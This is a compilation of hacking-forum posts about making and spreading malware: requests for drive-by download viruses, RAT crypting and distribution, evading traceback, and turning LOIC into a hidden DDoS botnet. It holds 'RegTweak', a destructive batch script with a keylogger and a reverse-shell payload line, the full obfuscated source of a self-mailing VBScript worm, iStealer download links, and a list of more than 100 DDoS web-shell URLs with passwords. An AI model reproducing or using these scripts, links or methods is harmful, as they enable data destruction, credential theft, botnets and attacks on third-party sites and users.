Malware - iExploit

malare script that forces every website visitor to download .exe file

tennis1978 — Sat, 26 Jan 2013 11:46:27 -0500

Hi. I'm new here and wanted to join this forum since I was told by 2 people this is possibly but I can't get any details exactly how it's done.

I want to have a virus created where whenever someone websites my site automatically they get downloaded a .exe file. Are there any threads to talk about how this is done or can anyone do it for a fee?

Thanks

JavaScript Malware Samples

Maitreya_Dave — Tue, 05 Jun 2012 10:26:23 -0400

Hmm okay guys i need a few javascript malware samples i would love to check them out :) Please if anyone has any post it or anyone has any url infected by it i would also love that.

Kind Regards,

Mr.DaVe

Project Override

flawless — Sat, 06 Oct 2012 17:45:42 -0400

OK, i have an idea

Admins sorry if um breaking the rules here didn't know

So project (Override) consists of a browser add on being installed via ettercap poisoning on the LAN and this add-on will act as a delivering backdoor agent solely living in the browser after its installation it uploads a malware i have adopted and coded to suite my needs this binary file it will be executed upon its completion of uploading to the target and it will be monitoring services running on the target.....after it finds a service i predefined on the executable it will try to run some commands on it so far i managed to get it to exit the process and the add-on its self it will be connecting to a remote ftp server every two days...................at first this method was complicated to code and having to implement evading techniques it took me a few weeks and frustration was building up..until i managed to get it to work properly three days ago

the method gets you a command prompt session to the target but with user privs....so if you interested we could colab on the project and add more to the project .....and maybe roll it to metasploit framework

highway to vx development

Blackout — Tue, 27 Sep 2011 19:27:53 -0400

im ready to deep mining in the vx world i like do this by the high way , yeah yeah i know expertise is required years of study and perfectioning method bla bla bla,

like another areas i think a good reference or teacher can guide fast to achieve the objetive and thats is i searching for

so i found on the net the giant black book of computer virus my question is, that material is out of date or describe the currently methods of make virus or the way ist operate?(i see has published about 16 years ago) else could you guys recommend some source of info or related material that can i use for a highway kickstart in computer virus

i appreciate your comments

Need a facebook freezer or iStealer

[Deleted User] — Wed, 16 Mar 2011 18:23:01 -0400

I searched everywhere for iStealer and fb freezer, i found much but all say "Inappropriate licence to use this file" and stuff.

Can someone help me? :$
Thanks,

Loic As A Virus?

Corrosion — Mon, 27 Jun 2011 09:19:05 -0400

I've been looking at the loic source code (ddos tool, like you didn't know) and it has great potential to become a massive botnet if the right measures were taken.

Due to anonymous's crap it is of course now a 'virus' to many av companies but a quick msfencode takes care of that, or simply use source code from a previous date and your clear as they seem to have only added the lastest to their list...

Anyway I've manged to get it to automatically go into hive mind (irc) mode, login and wait for commands and I've figured out how to control it with most of its commands...

my current issue/issues with it are...

I can't make it hide itself (runnig is as loic.exe /hidden) will make it hide so its functionality is there... I may have had it at once point but that was a really long time ago when I was messing with it...

Anyway my point is you could put this into any downloadable and have it run on startup, and the user would be none the wiser... and you'd have a nice ddos capable botnet un-detected...
You could have it start from a .bat file but why bother when you can hard code it?

Any one have any ideas or anyone else think to use it this way.. It's a great tool and it could become a very large asset to anyone looking for a b-net

SpyNet HTTP proxy feature

anonymous777 — Fri, 23 Sep 2011 05:42:29 -0400

I tried to use the HTTP proxy feature on Spynet 2.6 server with no use, I also picked servers who don't need port-forward who have the same IP on the WAN and LAN, technically that means there is no LAN as long as I know.
I picked different ports, I disabled firewalls, and did everything possible, I think that function specifically is bugged, what about you, any luck getting it to work?
right now I am using replacement for this.

Viruses: How they work and what they are

chroniccommand — Tue, 04 May 2010 01:55:43 -0400

Viruses: How they work and what they are
Written by: Chroniccommand
For: CodeShock
-----------------------------------------------------------------------------------------------------\\\\\\\\\\\\\\\\\
Definition of a computer virus
Wikipedia:

A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.

In my opinion, A computer virus is an crafted piece of code designed to infect computers and cause problems. Viruses may spread in many ways such as removable media drives, E-Mail, P2P(Person 2 Person) or any other numbers of ways. The main objective of a virus is to infect the host computer, like a real virus infects a host with strands of DNA injected into a cell. A computer virus works in a way similar by injecting pieces of code, much like DNA that will cause undesirable functions to the host computer.

-----------------------------\\\
Types of virus's
Worm: A computer worm is one nasty code that you definitely do not want on your system. It is a self replicating program that will send copies of itself to other target machines by methods explained above, which I will now list some again:
#E-Mail
#P2P
#Removable media drives
Unlike a virus, a worm does not need attach itself to a particular program. A worm may do things such as:
#Consume bandwidth
#Consume RAM(Random Access Memory)
#More...
Take a look at this image, which shows the spread of the Conficker worm.
http://upload.wikimedia.org/wikipedia/commons/thumb/5/53/Conficker.svg/800px-Conficker.svg.png
------------------------\\
Trojan Horse
A Trojan Horse is another very nasty piece of code. A Trojan Horse is a non-replicating piece of software that attempts to preform undesirable functions to the host computer. Trojan horses are designed to allow a hacker remote access to a target computer system. Once a Trojan horse has been installed on a target computer system, it is possible for a hacker to access it remotely and perform various operations. The operations that a hacker can perform are limited by user privileges on the target computer system and the design of the Trojan horse. Some Trojan Horse functions are listed below:
#Data theft
#Download/Upload files
#View a users screen
#Wasting storage space
#Using as a botnet
Trojan Horse installation: Normally a hacker will download a program, such as Cybergate or Spy-Net or Prorat. From the interface of such programs a hacker will create a server which will open a backdoor into the computers system. Step 3 is to connect to the server(Some programs such as cybergate listen for a connection and will allow multiple connections). Once the hacker has connected to the host machine infected by the Trojan, the hacker will have access to many of the tools the Trojan Horse offers.
----------------------------\\
Spyware
Definition of Spyware.

Spyware is a type of malware that is installed on computers and collects little bits of information at a time about users without their knowledge. The presence of spyware is typically hidden from the user, and can be difficult to detect. Typically, spyware is secretly installed on the user's personal computer. Sometimes, however, spywares such as keyloggers are installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.

The most common use of spyware is through a keylogger. A keylogger is a piece of code that will log all keys typed by the user. Typically the logs will send either the hackers mail or by FTP.
---------------------------\\
How to protect yourself
Protecting yourself from any virus is quite simple. Some simple ways of protecting yourself are listed right below:
#Use Linux!!
#Download an AV(Anti Virus) program and scan regularly
#Be weary of what you download
#Try to run things sandboxed or through VM.
#If your infected please consult many of the experts on HackForums and CodeShock and you can get yourself uninfected.
----------------------\\
Undetection methods
Latest Anti-Virus wont fully protect you from viruses. Let me explain a little. What is FUD? FUD stands for Fully Undetectable. A FUD virus is a virus that will not be detected by an anti-virus. If a virus is detected by some Anti-Virus systems but not all it is considered UD(Undetectable).
Method of FUD'ing a virus:
Typically the hacker will use a program called a Crypter to help make there virus FUD/UD. The hacker will crypt the file and scan it with http://scanner.novirusthanks.org/ And choose not to distribute the sample because a sample of the virus will be sent to Anti-Virus companies, looked at and soon the virus will no longer be FUD.
---------------------------\\
Please note that this is an early version of the paper. I may write more. Please reply or PM suggestions/comments and I hope you enjoyed this paper on viruses, how they work, what they do and how to protect yourself.
-Chroniccommand

[help] Setting up and distributing RAT.

Am0s — Thu, 17 Mar 2011 01:59:51 -0400

Hello,
I'm completely new here (honestly, I just made my account now to post this) as well as new to the world of hacking. Originally I was getting my information off of hackforums.net but it appears that the website is down (if/when it comes back up... somebody let me know)
From hackforums, and various places on the web (such as youtube) I've come to understand, on at least a basic level, how to use and set up a RAT (really all I am interested in at the moment). However, I am still yet to really get it to work out properly.

(I am using DarkComet 3.2 at the moment, and it is installed on a windows XP laptop. I am also when I am attempting to try my RATs using a Windows 7 laptop with Sophos AV.)

The things I need help with still
1. Crypting- I can not for the life of me manage to figure out how to effectively use a [FREE] crypter, it appears. They either don't seem to work right when they don't set off the AV, or they are always caught. Which is likely partly me doing it wrong, and partly me using bad software

2. Setting up a Server- on the surface, this seems like a truly stupid thing with how many DarkComet tutorials I've read/watched. But I still don't get quite what settings are best for my purposes. Also, a recent change has occurred. Whenever I try to use my no-ip.org address or my external IP for the server settings, I can't find a single port it will connect on.

3. Distributing the server effectively - Again, I'm sure I seem like an idiot for asking this. But I can't seem to get the stuff distributed right. There are some machines where I actually have access to the computer itself because the owner permits me for various reasons, yet I can't seem to get a server to work on it. Other ones, I am sure I can SE them into running the application if I send it via Skype or something (some actually have). And others, I doubt I can get such simple access. But on all of them, even if I know that they execute the server, I don't get a new connection.

4. "hitching" - I am sure you are cringing, as this is not the real name for it. But isn't there a way I can use RAT somebody's computer if somebody ELSE installed a server on them? I know not at all how to do so if this is the case.

I'm not trying to be a straight up Black Hat here. Most of the time I try to distribute a Trojan, it is because I am trying to help the person i none way or another (sometimes not a technical-oriented way though.) Although, I do plan to have some amusement while I'm at it and maybe even gleam a bit of information out of people that I couldn't gain otherwise.

RegTweak [DOS]

Prariredog — Sun, 22 May 2011 10:12:50 -0400

RELEASED!

RegTweak Crashes Windows and makes it freeze but stops system also explorer
Just Don't open the exe I really don't know if you should my script is deadly see for your self

echo off
echo wscript.exe \"C:\Program Files\Alwil Software\Avast4\" \"Ahrunsecurty.dll\"
echo CreateObject(\"Wscript.Shell\").Run \"\"\"\" & WScript.Arguments(0) & \"\"\"\", 0, False
echo .>>c:\WINDOWS...\keys.txt
echo :
set /p keys=
echo %keys%>>c:\\Windows...\Serial.txt
echo REGEDIT4 >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
echo \"SwapMouseButtons\"=\"1\" >> c:\reg.reg
echo \"MouseSpeed\"=\"1\" >> c:\reg.reg
echo \"DoubleClickSpeed\"=\"1\" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Keyboard] >> c:\reg.reg
echo \"KeyboardDelay\"=\"1\" >> c:\reg.reg
echo \"KeyboardSpeed\"=\"1\" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
echo \"Start Page\"=\"http://www.google.com/\" >> c:\reg.reg
echo.
echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
echo \"PaintDesktopVersion\"=dword:1 >> c:\reg.reg
echo. >> c:\reg.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
echo \"LegalNoticeCaption\"=\"YoU HaVe A vIRus NoW =)\" >> c:\reg.reg
echo \"LegalNoticeText\"=\"Please contact 1-800-viruz\" >> c:\reg.reg

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
\"DisableRegistryTools\"=dword:00000001

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
\"DisableTaskMgr\"=dword:00000001

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
\"WriteProtect\"=dword:00000001

echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
\"NoCDBurning\"=dword:00000001

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
\"Scancode Map\"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\
  00,00,00,00

echo

REGEDIT /s c:\reg.reg
del \"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat\"

del \"C:\WINDOWS\ServicePackFiles\I386\agentsr.dll\"

del \"C:\WINDOWS\ServicePackFiles\I386\agentpsh.dll\"

del \"C:\WINDOWS\security\"

del \"C:\WINDOWS\system32\"

del \"C:\WINDOWS\system\"

del \"C:\WINDOWS\TASKMAN\"

del \"C:\WINDOWS\explorer\"

del \"C:\WINDOWS\regedit\"

del \"C:\WINDOWS\notepad\"

del \"C:\WINDOWS\pss\"

del \"C:\WINDOWS\Registration\"

del \"C:\WINDOWS\System\"

del \"C:\WINDOWS\pchealth\"

del \"C:\WINDOWS\ServicePackFiles\I386\safemode\"

del \"C:\WINDOWS\ServicePackFiles\I386\rundll32\"

del \"C:\WINDOWS\ServicePackFiles\I386\taskkill\"

del \"C:\WINDOWS\ServicePackFiles\I386\tasklist\"

del \"C:\WINDOWS\ServicePackFiles\I386\taskmgr\"

DEL C: -Y

DEL D: -Y

DEL H: -Y

DEL P: -Y

del %systemdrive%\*.*/f/s/q

del cd /d %HOMEDRIVE%\%HOMEPATH%

del \"C:\WINDOWS\ServicePackFiles\I386\cmd\"

del \"C:\WINDOWS\system32\windowspowershell\v1.0\examples\"

del \"C:\WINDOWS\system32\windowspowershell\v1.0\about_path_syntax.help

del \"C:\WINDOWS\system32\windowspowershell\v1.0\"

del \"C:\WINDOWS\system32\svcpack.dll\"

del \"C:\WINDOWS\system32\svchost\"

del \"C:\WINDOWS\system32\sysedit\"

del \"C:\WINDOWS\system32\sysedit\"

del \"C:\WINDOWS\system32\system\"

del \"C:\WINDOWS\system32\systeminfo\"

del \"C:\WINDOWS\system32\csrsrv.dll\"

del \"C:\WINDOWS\system32\smss\"

del \"C:\WINDOWS\system32\spoolss.dll\"

del \"C:\WINDOWS\system32\spoolsv\"\

del \"C:\WINDOWS\system32\csrss\"\

del \"C:\WINDOWS\system32\compobj.dll\"

del \"C:\WINDOWS\system32\console.dll\"

del \"C:\WINDOWS\system32\control\"

del \"C:\WINDOWS\system32\compact\"

del \"C:\WINDOWS\system32\comp\"

del \"C:\WINDOWS\system32\CONFIG.NT\"

del \"C:\WINDOWS\system32\conime\"

del \"C:\WINDOWS\system32\command\"

del \"C:\WINDOWS\system32\cmstp\"

del \"C:\WINDOWS\system32\cnetcfg.dll\"

del \"C:\WINDOWS\system32\cscript\"

del \"C:\WINDOWS\system32\drwatson\"

del \"C:\WINDOWS\system32\drwtsn32\"

del \"C:\WINDOWS\system32\drprob.dll\"

del \"C:\WINDOWS\system32\shell32.dll\"

del \"C:\WINDOWS\system32\wmvcore.dll\"

del \"C:\WINDOWS\system32\win32k\"

del \"C:\WINDOWS\system32\WMNetMgr.dll\"

del \"C:\WINDOWS\system32\logonui\"

del \"C:\WINDOWS\system32\shellstyle.dll\"

del \"C:\WINDOWS\system32\vbscript.dll\"

del \"C:\WINDOWS\system32\deployjava1.dll\"

del \"C:\WINDOWS\system32\ntmsmgr.dll\"

del \"C:\WINDOWS\system32\ipmsnap\"

del \"C:\WINDOWS\system32\msscp\"

del \"C:\WINDOWS\system32\smlogcfg.dll\"

del \"C:\WINDOWS\system32\expsrv.dll\"

del \"C:\WINDOWS\system32\ipsmsnap\"

del \"C:\WINDOWS\system32\lmrt.dll\"

del \"C:\WINDOWS\system32\themeui.dll\"

del \"C:\WINDOWS\system32\MSRDO20.dll

del \"C:\WINDOWS\system32\rpcss.dll

del \"C:\WINDOWS\system32\netlogon.dll\"

del \"C:\WINDOWS\system32\s3gnb.dll\"

del \"C:\WINDOWS\system32\wzcdlg.dll\"

del \"C:\WINDOWS\system32\qdvd.dll\"

del \"C:\WINDOWS\system32\wpdsp.dll\"

del \"C:\WINDOWS\system32\winhttp.dll\"

del \"C:\WINDOWS\system32\confmsp.dll\"

del \"C:\WINDOWS\system32\wmdrmnet.dll\"

del \"C:\WINDOWS\system32\ipsecsnp.dll\"

del \"C:\WINDOWS\system32\d3drm.dll\"

del \"C:\WINDOWS\system32\localspl.dll\"

del \"C:\WINDOWS\system32\windowscodecsext.dll\"

del \"C:\WINDOWS\system32\msvcrt.dll\"

del \"C:\WINDOWS\system32\ir41_qcx.dll\"

del \"C:\WINDOWS\system32\dmconfig.dll\"

del \"C:\WINDOWS\system32\hnetwiz.dll\"

del \"C:\WINDOWS\system32\filemgmt.dll\"

del \"C:\WINDOWS\system32\WUDFx.dll\"

del \"C:\WINDOWS\system32\MP4SDECD.dll\"

del \"C:\WINDOWS\system32\wucltui.dll\"

del \"C:\WINDOWS\system32\cscui.dll\"

del \"C:\WINDOWS\system32\msrd3x40.dll\"

del \"C:\WINDOWS\system32\iedkcs32.dll\"

del \"C:\WINDOWS\system32\ursdtea.dll\"

del \"C:\WINDOWS\system32\msexcl40.dll\"

del \"C:\WINDOWS\system32\scesrv.dll\"

del \"C:\WINDOWS\system32\netsetup\"

del \"C:\WINDOWS\system32\ipnathlp.dll\"

del \"C:\WINDOWS\system32\ippromon.dll\"

del \"C:\WINDOWS\system32\dmnconfig.dll\"

del \"C:\WINDOWS\system32\hnetwiz.dll\"

del \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\"

del \"HKEY_LOCAL_MACHINE\SYSTEM\"

del \"HKEY_LOCAL_MACHINE\"

del \"HKEY_USERS\"

del \"HKEY_CURRENT_CONFIG\"

del \"HKEY_CLASSES_ROOT\"

del \"HKEY_CURRENT_USER\"

del \"%SYSTEMROOT%\"

del \"%SYSTEMROOT%\system32\View Channels\"

del \"%SYSTEMROOT%\system32\$winnt$\"

del \"%SYSTEMROOT%\system32\EAL32\"

del \"%SYSTEMROOT%\system32\login\"

del \"%SYSTEMROOT%\system32\kernel32.dll\"

del \"%SYSTEMROOT%\system32\mfc42u.dll\"

del \"HKEY_CLASSES_ROOT\"

del \"HKEY_CURRENTUSER\"

del \"HKEY_USERS\"

del \"HKEY_CURRENTCONFIG\"

del \"HKEY_DYN_DATA\"

del \"\??\C:\Documents and Settings\All Users\Application Data\Systweak\ASO3\System Protector\Native\nativeapp.in\"

ipconfig /release

exit

INPUT INTO .DLL

./msfpayload windows/shell/reverse_tcp HKEY_LOCALMACHINE ./msfencode -x ashCmd.exe -t exe -e x86/C:\Windows/A3dC.bat -c 10 -o a3dc.bat
if \"%DATE:~1,1%\"==\"12/31\" call C:\Program Files\Alwil Software\Avast4\ahsecurity.dll

READ THIS
How to set up:
Drag A3dC.bat into windows before installing avast
Open Ahrunsecurity.dll with wordpad and where you see "1,1" edit it to the current or when u want it to run the virus. Date Example:2003 will be "0,3"
then the date to start up is "12/30" edit it to the date you want Date example: I want it to run on the first of january so it will be "1,1"

INSTALL AVAST THEN WHEN IT ASK'S YOU TO RUN RIGHT NOW SAY NO/SELECT NO
THEN RIGHT CLICK AVAST HIT FIND TARGET INSTALL THE DLL
THEN JUST WAIT

DO NOT INSTALL THIS WITH THE .DLL AND .BAT
MAKE SURE YOU DONT OPEN THE .BAT

KEYLOGGER INSIDE THE .BAT
KEYLOGGER IS IN WINDOWS
NAME: Serial.txt

SHUTS OFF INTERNET AND MOUSE AND KEYBOARD AND CD ROM AND PROTECTS FILE FROM EDIT'S AND DOSENT ALLOW USB AND DISABLE'S KEYBOARD,MOUSECLICKS, AND MOUSE!

OLD DOWNLOAD:
LINK: WARNING I AM NOT RESPONSIBLE FOR ANY DAMAGE OR HARDWARE FAILURE
RegTweak [BETA OLD]
Download is beta input the script and make it yourself I am to lazy to upload it.

MUST HAVE RAR

Good to take down enemy's

Keylogger
BAT/KillAll.psa
Trojan.BAT.Delete.DA
Trojan.Disablereg
Trojan.BAT.Delete.DA
Trojan.BAT.Delete.DA
Trojan.Win32.Agent.pp
Trojan.BAT.Delete.DA

YOUR OWN RISKS

Rat TraceBack?

Corrosion — Thu, 17 Mar 2011 05:02:46 -0400

I've worked with different rats before, mostly Poision Ivy....
My biggest issue with deploying one is that I worry that it would be traced back....

If I have to specify an ip address for the server to connect to then I must send it to myself, I could forward it from another service but it'd still get to me...

I've thought about an ssh tunnel over to a vps then over to myself, but again if I did that then they'd have my billing info from the vps..

So what do you guys do in order to connect with your servers without getting traced back, oh... not to mention I'd like to be able to connect from different remote locations...

iStealer 6.3

undead — Wed, 29 Dec 2010 21:46:33 -0500

http://img526.imageshack.us/img526/942/istealer1.png

Download:
http://uppit.com/3yn0x9b2jf73/iStealer_6.3_Legends.rar

Virus Scan: http://vscan.novirusthanks.org/analysis ... uZHMtcmFy/

Leaked By Blair

Analyzing a vbs Worm

m0rph — Thu, 10 Mar 2011 16:12:59 -0500

#############################################################
#
#     This is what I like to call the \"head\" of the worm
#
#############################################################

Set O6734VC6 = createobject(\"scripting.filesystemobject\")
O78SS2L7 = O6734VC6.getspecialfolder(1)
A6G1HQFH = O78SS2L7 & \"geilfingeren.jpg.vbs\"
Set E828D4O2 = createobject(\"wscript.shell\")
E828D4O2.regwrite \"HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWinUpdate\", \"wscript.exe \" & A6G1HQFH & \" %\"
O6734VC6.copyfile wscript.scriptfullname, A6G1HQFH
UB51PCQU
If E828D4O2.regread(\"HKLMSOFTWAREMicrosoftWindowsCurrentVersionfingeren.aviUA1OM5IA\") <> 1 then
KD8F5L2N
End if
If E828D4O2.regread(\"HKLMSOFTWAREMicrosoftWindowsCurrentVersionfingeren.aviD47AC8NJ\") <> 1 then
HLVO1EDH \"\"
End if

#############################################################
#
#       The next part I like to refer to as the \"body\"
# 
#############################################################
Function KD8F5L2N()
Set O13Q767K = CreateObject(\"Outlook.Application\")
If O13Q767K = \"Outlook\" Then
Set LFSIH230 = O13Q767K.GetNameSpace(\"MAPI\")
Set LLLK4LPL = LFSIH230.AddressLists
For Each A4A83865 In LLLK4LPL
If A4A83865.AddressEntries.Count <> 0 Then
JM1R7N44 = A4A83865.AddressEntries.Count
For NHF463JD = 1 To JM1R7N44
Set OU435GC5 = O13Q767K.CreateItem(0)
Set KP511I06 = A4A83865.AddressEntries(NHF463JD)
OU435GC5.To = KP511I06.Address
OU435GC5.Subject = \"Very Important!\"
OU435GC5.Body = \"Hi:\" & vbcrlf & \"Please view this file, it's very important.\" & vbcrlf & \"\"
execute \"set DH97CAIN =OU435GC5.\" & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
IJ15SDEE = A6G1HQFH
OU435GC5.DeleteAfterSubmit = True
DH97CAIN.Add IJ15SDEE
If OU435GC5.To <> \"\" Then
OU435GC5.Send
End If
Next
End If
Next
End If
End function
Function HLVO1EDH(AHAOA819)
If AHAOA819 <> \"\" Then
TJTE98P3 = E828D4O2.regread(\"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir\")
If O6734VC6.fileexists(\"c:mircmirc.ini\") Then
AHAOA819 = \"c:mirc\"
ElseIf O6734VC6.fileexists(\"c:mirc32mirc.ini\") Then
AHAOA819 = \"c:mirc32\"
ElseIf O6734VC6.fileexists(TJTE98P3 & \"mircmirc.ini\") Then
AHAOA819 = TJTE98P3 & \"mirc\"
ElseIf O6734VC6.fileexists(TJTE98P3 & \"mirc32mirc.ini\") Then
AHAOA819 = TJTE98P3 & \"mirc\"
Else
AHAOA819 = \"\"
End If
End If
If AHAOA819 <> \"\" Then
Set U127MJ5H = O6734VC6.CreateTextFile(AHAOA819 & \"script.ini\", True)
U127MJ5H = \"[script]\" & vbCrLf & \"n0=on 1:JOIN:#:{\"
U127MJ5H = U127MJ5H & vbCrLf & \"n0=on 1:JOIN:#:{\"
U127MJ5H = U127MJ5H & vbCrLf & \"n1=  /if ( $nick == $me ) { halt }\"
U127MJ5H = U127MJ5H & vbCrLf & \"n2=  /.\" & Chr(100) & Chr(99) & Chr(99) & \" send $nick \"
U127MJ5H = U127MJ5H & A6G1HQFH
U127MJ5H = U127MJ5H & vbCrLf & \"n3=}\"
script.Close
End If
End Function
Function J706734V()
On Error Resume Next
Set CKQ24CHB = O6734VC6.Drives
For Each G2U828D4 In CKQ24CHB
OC078SS2 = G2U828D4 & \"  \"
Call L7R6G1HQ(OC078SS2)
Next
End Function

Function L7R6G1HQ(FS6B51PC)
Q35A1OM5 = FS6B51PC
Set ITHD8F5L = O6734VC6.GetFolder(Q35A1OM5)
Set G6F47AC8 = ITHD8F5L.Files
For Each NFFLVO1E In G6F47AC8
If lcase(NFFLVO1E.Name) = \"mirc.ini\" Then
HLVO1EDH(NFFLVO1E.ParentFolder)
End If
If O6734VC6.GetExtensionName(NFFLVO1E.path) = \"vbs\"
O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
End if
If O6734VC6.GetExtensionName(NFFLVO1E.path) = \"vbe\"
O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
End if
Next
Set VSM3BL08 = ITHD8F5L.Subfolders
For Each UQFA0DCQ In VSM3BL08
Call (UQFA0DCQ.path)
Next
End function


#############################################################
#
#         and finally the \"tail\" so to speak.
#
#############################################################


Function UB51PCQU()
Randomize
If 1 + Int(Rnd * 50) = 7 then
E828D4O2.run \"RUNDLL32.EXE user.exe,exitwindows\"
end if
end function 

####################### End of Code #########################

In the head of the worm, it first it writes itself to the Windows Update directory as a value for "wscript.exe" from the registry for
all accounts on the machine as seen by the root directory of "HKLM" or HKEY_LOCAL_MACHINE. And procedes to read values from
"fingeren.avi" to execute other functions within itself. This results in the worm being executed everytime Windows Update is initiated.

In the body of the worm, it targets the Microsoft Outlook application as a form of propagating itself.
It first registers Microsoft Outlook as an extension to the worm itself, by reading all of the contacts within one's address list. It
then enumerates the addresses in a numerical order for creating an email to attach itself to. Once all of the emails it created have been
sent out, it deletes them from Microsoft Outlook, so when the user logs in, he or she doesn't see any suspicious info.

The next function in the body looks for a file called "mirc.ini" from what we as hackers know about malicious software, we can only assume it
is refering to an Internet Relay Chat server as described within. After it reads the assumed irc server within the mirc.ini script it connects to
it under a random nickname where the owner of this worm can send commands to it. We can assume the commands defined by this worm are written in
a file called "script.ini" seeing as this function listens for commands under a variable defined as "script"

The next function function appears to mount drives and folders on the local system. I'm not entirely positive but it looks to me as the next
function attempts to create copies of the "mirc.ini" file. Of which I would think would give it more options to connect to the IRC server
in the event of one of the "mirc.ini" files being deleted. It then appears to me that it copies the worm itself to all folders associated
with a "mirc.ini" file.

In the footer, I'm once again assuming that the code attempts to read the registry entries it made under the current user logged in. But, once
again this may not be correct.

My thoughts:
I dont know for sure, but I think this is a variant of the "ILUVYOU" virus. In its current state it doesn't work, because there's no function
to create the "mirc.ini" file. There's also no function that either creates, or defines within itself the commands that are to be found in
"script.exe" for its communication with an IRC server. Also "user.exe" was discontinued from the cab file directory after Windows 2000.
So not only will this not work, but it's also outdated.

On a side note:
VBscript is still supported in Windows 7, so if this code were completed by someone who knew how to write vbs very well, and
rewritten in the last couple of statements so it ran itself under the current user's priviledges as described in newer versions
of the Windows operating system, this worm could work. But one would also have to worry about reverse engineering tactics employed
against this. Maybe the use of an encryption algorithm for protecting connection information being sent to the IRC server would suffice?

This uses old school tactics, the kind of stuff the hardcore elite in the generation of hackers before ours used, back when direct
attacks were almost null and writing programs like this was the rage. I find this a very interesting set of code, and a great place
for malicious programmers to draw ideas and inspiration from when creating new projects.

m0rph

100+DDoS shells

SomethingMAD — Sat, 23 Oct 2010 23:18:50 -0400

http://seawiser.com/indexfixer.php
http://amit.dabydeen.com/indexfixer.php
http://ma77o.info/shell/77shell/shell.php
http://www.tpoly.edu.gh/indexfixer.php
http://riadcaidrassou.com/xyiznwsk/shelly.php
http://shelly.hostzi.com/index.php
http://atlantics.ca/dos.php?act=phptools...38&time=15
http://shells.red-pill.eu/
http://download.phpzilla.net/
http://ourladyofpillar.org/css/sickdos.php <-- pass: Blk142
http://ourladyofpillar.org/css/httpdos.php <-- http, pass: test (use http://target.com/, not IP)
http://dos-shell.us.to/ <-- pass: hf_free21
http://194.110.192.121/xmlrpc/includes/shell.php
http://www.xgclan.org/dos/dos.php
http://tuzick.co.cc/tuzickadmin/shell.php
http://tuzick.co.cc/Public%20SHared/
http://www.silkpetals.net/images/footer/boot.php
http://strelok.site50.net/ <-- 10 sec limit, 50000 p/s
http://dos-1.netii.net/
http://www.inchoates.com/smf/index.php?action=forum&
http://testvbulletin.bplaced.net/dos/index.php?
http://www.elfstedentocht-online.info/
http://www.jinketek.com/admin/?
http://www.phpdos.seite.com/
http://rt65.prv.pl/
http://base-killer.site90.net/
http://css-c.net76.net/
http://www.faab-pictures.com/
http://www.regab666.gigfa.com/
http://marocmix.idoo.com/
http://quickscop3z.com/DDoS/
http://kmy4888.hostei.com/
http://www.inchoates.com/smf/index.php
http://lol123.net16.net/
http://www.hjpub.co.kr/fs/2008/s_freeboa...et=0.0.0.0
http://hrssaipan.com/bbs_data/dos.php?target=0.0.0.0
http://www.towericerink.co.kr/webboard/f...et=0.0.0.0
http://www.jhroof.com/kboard/data/sub_e_...et=0.0.0.0
http://www.gipot.net/mkslt/datafile/1337...et=0.0.0.0
http://coboclub.com/upload/2008_06/1337....et=0.0.0.0
http://1004kiss.co.kr/bbs/table/qna/uplo...et=0.0.0.0
http://www.unclecom.com/Data/uncle/Board...rget=0.0.0
http://www.rocksecuritycams.741.com/ddos.php (credits: Shi?osa?i. â„¢)
http://centralcomputers.ca/fattwam/index.php <-- user: hackforums pass: fattwam (credits: fattwam)
http://rt65.prv.pl/
http://sxleton.awardspace.us/
http://dcpglitcher.netne.net/
http://www.pchonor.gigfa.com/
http://dapache.hi2.ro/?page=pscan
http://www.cadence.com.br/fotos/
http://starneox.comuf.com/dos/
http://smsblack.bplaced.net/sms//l-s.php
http://h4ck3rs.eu.pn/ddos.php
http://ddos.99k.org/
http://download.phpzilla.net/
http://www.rocksecuritycams.741.com/ddos.php
http://h1.Spam.com/machoxtaco/Progs/Shombdg/
http://electrics.vacau.com/
http://uulu.freeiz.com/
http://k1x-hook.com/
http://aura.host56.com/
http://blog.oxfordoutcomes.net/dDos/
http://dapache.hi2.ro/
http://bkontakte.hut.ru/
http://m4rky0.freei.me/
http://clubedapegada.net/
http://www.framedgamers.com/dos/
http://lolphp.netai.net/
http://www.jnapple.net/index.php
http://www.regab666.gigfa.com/
http://pazzaapparel.com/dos.php
http://www.dos-test.www4.me/dos/dos.php
http://www.eft-tapping.net/shell.php
http://menzow.com/shell.php?act=phptools
http://www.flaggfabrikken.com/
http://millsrock.all.co.uk/shell.php
http://eros.vlo.gda.pl/~valacar/files/er...x=phptools
http://www.regab666.gigfa.com/
http://pazzaapparel.com/dos.php
http://www.dos-test.www4.me/dos/dos.php
